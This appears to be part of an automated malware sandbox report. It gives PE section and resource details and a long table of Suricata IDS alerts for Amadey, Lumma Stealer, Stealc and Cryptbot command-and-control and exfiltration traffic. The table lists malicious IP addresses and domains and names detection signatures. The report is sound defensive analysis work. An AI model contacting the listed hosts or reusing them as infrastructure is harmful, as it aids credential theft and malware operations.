dblbhqnk	0x6b000	0x2b1000	0x2b0e00	84a69ff91ff38749b62eafa9674680c3	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
rrjzixml	0x31c000	0x1000	0x400	bb9b8d5f87f72857856ce9047309f2f8	False	0.8115234375	data	6.3039551381799885	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x31d000	0x3000	0x2200	9f03f090c131b008833a8b124397acf1	False	0.06353400735294118	DOS executable (COM)	0.8102681053916871	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x69070	0x3e4	XML 1.0 document, ASCII text			0.48092369477911645
RT_MANIFEST	0x69454	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5931758530183727

Imports

DLL	Import
kernel32.dll	lstrcpy

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-22T02:16:07.338429+0100	2856147	ETPRO MALWARE Amadey CnC Activity M3	1	192.168.2.4	49753	185.215.113.43	80	TCP
2024-12-22T02:16:12.042671+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49765	31.41.244.11	80	TCP
2024-12-22T02:16:18.699038+0100	2856122	ETPRO MALWARE Amadey CnC Response M1	1	185.215.113.43	80	192.168.2.4	49759	TCP
2024-12-22T02:16:20.050715+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.4	49785	185.215.113.43	80	TCP
2024-12-22T02:16:21.681018+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49787	31.41.244.11	80	TCP
2024-12-22T02:16:27.157819+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.4	49802	185.215.113.43	80	TCP
2024-12-22T02:16:27.549091+0100	2058397	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (pancakedipyps .click)	1	192.168.2.4	57173	1.1.1.1	53	UDP
2024-12-22T02:16:28.617935+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49804	31.41.244.11	80	TCP
2024-12-22T02:16:29.118059+0100	2058398	ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI)	1	192.168.2.4	49806	172.67.209.202	443	TCP
2024-12-22T02:16:29.118059+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49806	172.67.209.202	443	TCP
2024-12-22T02:16:29.867508+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49806	172.67.209.202	443	TCP
2024-12-22T02:16:29.867508+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49806	172.67.209.202	443	TCP
2024-12-22T02:16:31.600922+0100	2058398	ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI)	1	192.168.2.4	49814	172.67.209.202	443	TCP
2024-12-22T02:16:31.600922+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49814	172.67.209.202	443	TCP
2024-12-22T02:16:32.377836+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.4	49814	172.67.209.202	443	TCP
2024-12-22T02:16:32.377836+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49814	172.67.209.202	443	TCP
2024-12-22T02:16:35.270547+0100	2058398	ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI)	1	192.168.2.4	49822	172.67.209.202	443	TCP
2024-12-22T02:16:35.270547+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49822	172.67.209.202	443	TCP
2024-12-22T02:16:35.730536+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49823	104.21.67.146	443	TCP
2024-12-22T02:16:35.972597+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.4	49824	185.215.113.43	80	TCP
2024-12-22T02:16:36.162646+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49823	104.21.67.146	443	TCP
2024-12-22T02:16:36.162646+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49823	104.21.67.146	443	TCP
2024-12-22T02:16:36.418896+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.4	49822	172.67.209.202	443	TCP
2024-12-22T02:16:37.412391+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49831	104.21.67.146	443	TCP
2024-12-22T02:16:37.421176+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49830	31.41.244.11	80	TCP
2024-12-22T02:16:37.742476+0100	2058398	ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI)	1	192.168.2.4	49832	172.67.209.202	443	TCP
2024-12-22T02:16:37.742476+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49832	172.67.209.202	443	TCP
2024-12-22T02:16:38.219742+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.4	49831	104.21.67.146	443	TCP
2024-12-22T02:16:38.219742+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49831	104.21.67.146	443	TCP
2024-12-22T02:16:40.187887+0100	2058398	ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI)	1	192.168.2.4	49837	172.67.209.202	443	TCP
2024-12-22T02:16:40.187887+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49837	172.67.209.202	443	TCP
2024-12-22T02:16:42.400597+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.4	49842	185.215.113.43	80	TCP
2024-12-22T02:16:42.967084+0100	2058398	ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI)	1	192.168.2.4	49843	172.67.209.202	443	TCP
2024-12-22T02:16:42.967084+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49843	172.67.209.202	443	TCP
2024-12-22T02:16:43.035757+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49844	104.21.67.146	443	TCP
2024-12-22T02:16:43.848701+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49851	31.41.244.11	80	TCP
2024-12-22T02:16:45.360976+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49852	104.21.67.146	443	TCP
2024-12-22T02:16:45.744612+0100	2058398	ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI)	1	192.168.2.4	49858	172.67.209.202	443	TCP
2024-12-22T02:16:45.744612+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49858	172.67.209.202	443	TCP
2024-12-22T02:16:46.656890+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.4	49852	104.21.67.146	443	TCP
2024-12-22T02:16:48.149320+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49863	104.21.67.146	443	TCP
2024-12-22T02:16:49.044371+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.4	49865	185.215.113.43	80	TCP
2024-12-22T02:16:49.288084+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.4	49866	212.193.31.8	80	TCP
2024-12-22T02:16:50.948817+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49872	31.41.244.11	80	TCP
2024-12-22T02:16:50.956303+0100	2058398	ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI)	1	192.168.2.4	49875	172.67.209.202	443	TCP
2024-12-22T02:16:50.956303+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49875	172.67.209.202	443	TCP
2024-12-22T02:16:51.289707+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49876	104.21.67.146	443	TCP
2024-12-22T02:16:51.740330+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49875	172.67.209.202	443	TCP
2024-12-22T02:16:54.041776+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49885	104.21.67.146	443	TCP
2024-12-22T02:16:55.433332+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.4	49890	212.193.31.8	80	TCP
2024-12-22T02:16:57.698061+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49897	104.21.67.146	443	TCP
2024-12-22T02:16:58.461627+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49897	104.21.67.146	443	TCP
2024-12-22T02:17:01.316285+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.4	49906	185.215.113.43	80	TCP
2024-12-22T02:17:01.499458+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.4	49907	212.193.31.8	80	TCP
2024-12-22T02:17:02.800003+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49914	31.41.244.11	80	TCP
2024-12-22T02:17:07.846728+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.4	49925	212.193.31.8	80	TCP
2024-12-22T02:17:13.860156+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.4	49942	185.215.113.43	80	TCP
2024-12-22T02:17:13.976404+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.4	49945	212.193.31.8	80	TCP
2024-12-22T02:17:15.391073+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49947	31.41.244.11	80	TCP
2024-12-22T02:17:20.238998+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.4	49960	212.193.31.8	80	TCP
2024-12-22T02:17:26.611114+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.4	49974	212.193.31.8	80	TCP
2024-12-22T02:17:26.991253+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.4	49978	185.215.113.43	80	TCP
2024-12-22T02:17:28.444771+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49980	31.41.244.11	80	TCP
2024-12-22T02:17:33.198289+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.4	49991	212.193.31.8	80	TCP
2024-12-22T02:17:36.074423+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.4	49997	185.215.113.43	80	TCP
2024-12-22T02:17:37.607585+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	50004	185.215.113.16	80	TCP
2024-12-22T02:17:38.683428+0100	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.4	50005	185.121.15.192	80	TCP
2024-12-22T02:17:39.353977+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.4	50011	212.193.31.8	80	TCP
2024-12-22T02:17:40.574994+0100	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.4	50016	185.121.15.192	80	TCP
2024-12-22T02:17:44.671627+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.4	50024	185.215.113.43	80	TCP
2024-12-22T02:17:45.817182+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.4	50025	212.193.31.8	80	TCP
2024-12-22T02:17:46.221182+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	50026	185.215.113.16	80	TCP
2024-12-22T02:17:50.734247+0100	2058378	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat)	1	192.168.2.4	61253	1.1.1.1	53	UDP
2024-12-22T02:17:51.632273+0100	2058364	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat)	1	192.168.2.4	65072	1.1.1.1	53	UDP
2024-12-22T02:17:52.164628+0100	2058360	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (discokeyus .lat)	1	192.168.2.4	53998	1.1.1.1	53	UDP
2024-12-22T02:17:53.064208+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.4	50051	212.193.31.8	80	TCP
2024-12-22T02:17:53.710812+0100	2058361	ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)	1	192.168.2.4	50060	104.21.21.99	443	TCP
2024-12-22T02:17:53.710812+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50060	104.21.21.99	443	TCP
2024-12-22T02:17:54.744267+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	50060	104.21.21.99	443	TCP
2024-12-22T02:17:54.744267+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	50060	104.21.21.99	443	TCP
2024-12-22T02:17:55.833608+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.4	50061	185.215.113.43	80	TCP
2024-12-22T02:17:56.390951+0100	2058361	ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)	1	192.168.2.4	50068	104.21.21.99	443	TCP
2024-12-22T02:17:56.390951+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50068	104.21.21.99	443	TCP
2024-12-22T02:17:57.454162+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	50069	185.215.113.16	80	TCP
2024-12-22T02:17:59.189888+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.4	50068	104.21.21.99	443	TCP
2024-12-22T02:17:59.189888+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	50068	104.21.21.99	443	TCP
2024-12-22T02:17:59.422173+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.4	50078	212.193.31.8	80	TCP
2024-12-22T02:18:04.224431+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.4	50089	185.215.113.43	80	TCP
2024-12-22T02:18:05.847798+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	50096	185.215.113.16	80	TCP
2024-12-22T02:18:06.202323+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.4	50097	212.193.31.8	80	TCP
2024-12-22T02:18:09.608650+0100	2058378	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat)	1	192.168.2.4	60789	1.1.1.1	53	UDP
2024-12-22T02:18:09.812504+0100	2058364	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat)	1	192.168.2.4	49839	1.1.1.1	53	UDP
2024-12-22T02:18:11.249239+0100	2058361	ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)	1	192.168.2.4	50120	104.21.21.99	443	TCP
2024-12-22T02:18:11.249239+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50120	104.21.21.99	443	TCP
2024-12-22T02:18:12.264243+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	50120	104.21.21.99	443	TCP
2024-12-22T02:18:12.264243+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	50120	104.21.21.99	443	TCP
2024-12-22T02:18:12.442007+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.4	50121	185.215.113.206	80	TCP
2024-12-22T02:18:12.786767+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.4	50124	212.193.31.8	80	TCP
2024-12-22T02:18:12.967736+0100	2044244	ET MALWARE Win32/Stealc Requesting browsers Config from C2	1	192.168.2.4	50121	185.215.113.206	80	TCP
2024-12-22T02:18:13.123701+0100	2044245	ET MALWARE Win32/Stealc Active C2 Responding with browsers Config	1	185.215.113.206	80	192.168.2.4	50121	TCP
2024-12-22T02:18:13.327037+0100	2058361	ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)	1	192.168.2.4	50125	104.21.21.99	443	TCP
2024-12-22T02:18:13.327037+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50125	104.21.21.99	443	TCP
2024-12-22T02:18:13.443362+0100	2044246	ET MALWARE Win32/Stealc Requesting plugins Config from C2	1	192.168.2.4	50121	185.215.113.206	80	TCP
2024-12-22T02:18:13.727782+0100	2058361	ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)	1	192.168.2.4	50128	104.21.21.99	443	TCP
2024-12-22T02:18:13.727782+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50128	104.21.21.99	443	TCP
2024-12-22T02:18:13.931765+0100	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	185.215.113.206	80	192.168.2.4	50121	TCP
2024-12-22T02:18:14.500972+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.4	50128	104.21.21.99	443	TCP
2024-12-22T02:18:14.500972+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	50128	104.21.21.99	443	TCP
2024-12-22T02:18:15.274222+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.4	50129	185.215.113.43	80	TCP
2024-12-22T02:18:15.340948+0100	2044248	ET MALWARE Win32/Stealc Submitting System Information to C2	1	192.168.2.4	50121	185.215.113.206	80	TCP
2024-12-22T02:18:15.853049+0100	2058361	ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)	1	192.168.2.4	50134	104.21.21.99	443	TCP
2024-12-22T02:18:15.853049+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50134	104.21.21.99	443	TCP
2024-12-22T02:18:16.150144+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	50121	185.215.113.206	80	TCP
2024-12-22T02:18:18.929899+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.4	50139	212.193.31.8	80	TCP
2024-12-22T02:18:19.112536+0100	2058361	ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)	1	192.168.2.4	50140	104.21.21.99	443	TCP
2024-12-22T02:18:19.112536+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50140	104.21.21.99	443	TCP
2024-12-22T02:18:20.871417+0100	2058361	ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)	1	192.168.2.4	50141	104.21.21.99	443	TCP
2024-12-22T02:18:20.871417+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50141	104.21.21.99	443	TCP
2024-12-22T02:18:21.671674+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.4	50141	104.21.21.99	443	TCP
2024-12-22T02:18:24.407639+0100	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.4	50144	185.121.15.192	80	TCP
2024-12-22T02:18:25.476403+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.4	50153	212.193.31.8	80	TCP
2024-12-22T02:18:26.676005+0100	2058361	ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)	1	192.168.2.4	50157	104.21.21.99	443	TCP
2024-12-22T02:18:26.676005+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50157	104.21.21.99	443	TCP
2024-12-22T02:18:27.288592+0100	2058361	ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)	1	192.168.2.4	50158	104.21.21.99	443	TCP
2024-12-22T02:18:27.288592+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50158	104.21.21.99	443	TCP
2024-12-22T02:18:31.148526+0100	2058361	ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)	1	192.168.2.4	50162	104.21.21.99	443	TCP
2024-12-22T02:18:31.148526+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50162	104.21.21.99	443	TCP
2024-12-22T02:18:32.076457+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.4	50165	212.193.31.8	80	TCP
2024-12-22T02:18:35.225117+0100	2058361	ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)	1	192.168.2.4	50168	104.21.21.99	443	TCP
2024-12-22T02:18:35.225117+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50168	104.21.21.99	443	TCP
2024-12-22T02:18:35.564629+0100	2058361	ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)	1	192.168.2.4	50169	104.21.21.99	443	TCP
2024-12-22T02:18:35.564629+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50169	104.21.21.99	443	TCP
2024-12-22T02:18:37.111236+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	50163	185.215.113.206	80	TCP
2024-12-22T02:18:38.307122+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.4	50171	212.193.31.8	80	TCP
2024-12-22T02:18:39.513727+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	50163	185.215.113.206	80	TCP
2024-12-22T02:18:40.872079+0100	2058361	ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)	1	192.168.2.4	50174	104.21.21.99	443	TCP
2024-12-22T02:18:40.872079+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50174	104.21.21.99	443	TCP
2024-12-22T02:18:41.135548+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	50163	185.215.113.206	80	TCP
2024-12-22T02:18:41.650873+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	50174	104.21.21.99	443	TCP
2024-12-22T02:18:42.521973+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	50163	185.215.113.206	80	TCP
2024-12-22T02:18:42.523962+0100	2058361	ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)	1	192.168.2.4	50177	104.21.21.99	443	TCP
2024-12-22T02:18:42.523962+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50177	104.21.21.99	443	TCP
2024-12-22T02:18:42.555707+0100	2058378	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat)	1	192.168.2.4	64282	1.1.1.1	53	UDP
2024-12-22T02:18:42.810886+0100	2058364	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat)	1	192.168.2.4	52072	1.1.1.1	53	UDP
2024-12-22T02:18:43.359656+0100	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	2	192.168.2.4	50178	185.215.113.16	80	TCP
2024-12-22T02:18:44.392432+0100	2058361	ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)	1	192.168.2.4	50180	104.21.21.99	443	TCP
2024-12-22T02:18:44.392432+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50180	104.21.21.99	443	TCP
2024-12-22T02:18:45.247121+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.4	50181	212.193.31.8	80	TCP
2024-12-22T02:18:45.568691+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	50180	104.21.21.99	443	TCP
2024-12-22T02:18:45.568691+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	50180	104.21.21.99	443	TCP
2024-12-22T02:18:46.528368+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	50163	185.215.113.206	80	TCP
2024-12-22T02:18:46.898718+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50185	104.21.89.115	443	TCP
2024-12-22T02:18:47.155471+0100	2058361	ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)	1	192.168.2.4	50186	104.21.21.99	443	TCP
2024-12-22T02:18:47.155471+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50186	104.21.21.99	443	TCP
2024-12-22T02:18:47.244318+0100	2058361	ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)	1	192.168.2.4	50189	104.21.21.99	443	TCP
2024-12-22T02:18:47.244318+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50189	104.21.21.99	443	TCP
2024-12-22T02:18:47.900850+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	50185	104.21.89.115	443	TCP
2024-12-22T02:18:47.900850+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	50185	104.21.89.115	443	TCP
2024-12-22T02:18:47.990676+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	50163	185.215.113.206	80	TCP
2024-12-22T02:18:48.034298+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.4	50189	104.21.21.99	443	TCP
2024-12-22T02:18:48.034298+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	50189	104.21.21.99	443	TCP
2024-12-22T02:18:48.068143+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	50186	104.21.21.99	443	TCP
2024-12-22T02:18:49.505434+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50205	104.21.89.115	443	TCP
2024-12-22T02:18:49.630549+0100	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	2	192.168.2.4	50203	185.215.113.16	80	TCP
2024-12-22T02:18:50.417360+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.4	50205	104.21.89.115	443	TCP
2024-12-22T02:18:50.417360+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	50205	104.21.89.115	443	TCP
2024-12-22T02:18:51.583167+0100	2058361	ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)	1	192.168.2.4	50222	104.21.21.99	443	TCP
2024-12-22T02:18:51.583167+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50222	104.21.21.99	443	TCP
2024-12-22T02:18:51.845973+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.4	50223	212.193.31.8	80	TCP
2024-12-22T02:18:52.550863+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.4	50222	104.21.21.99	443	TCP
2024-12-22T02:18:53.046933+0100	2856122	ETPRO MALWARE Amadey CnC Response M1	1	185.215.113.43	80	192.168.2.4	50191	TCP
2024-12-22T02:18:54.202297+0100	2058361	ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)	1	192.168.2.4	50238	104.21.21.99	443	TCP
2024-12-22T02:18:54.202297+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50238	104.21.21.99	443	TCP
2024-12-22T02:18:54.437305+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.4	50233	185.215.113.43	80	TCP
2024-12-22T02:18:54.451679+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50240	104.21.67.146	443	TCP
2024-12-22T02:18:54.731503+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	50241	185.215.113.16	80	TCP
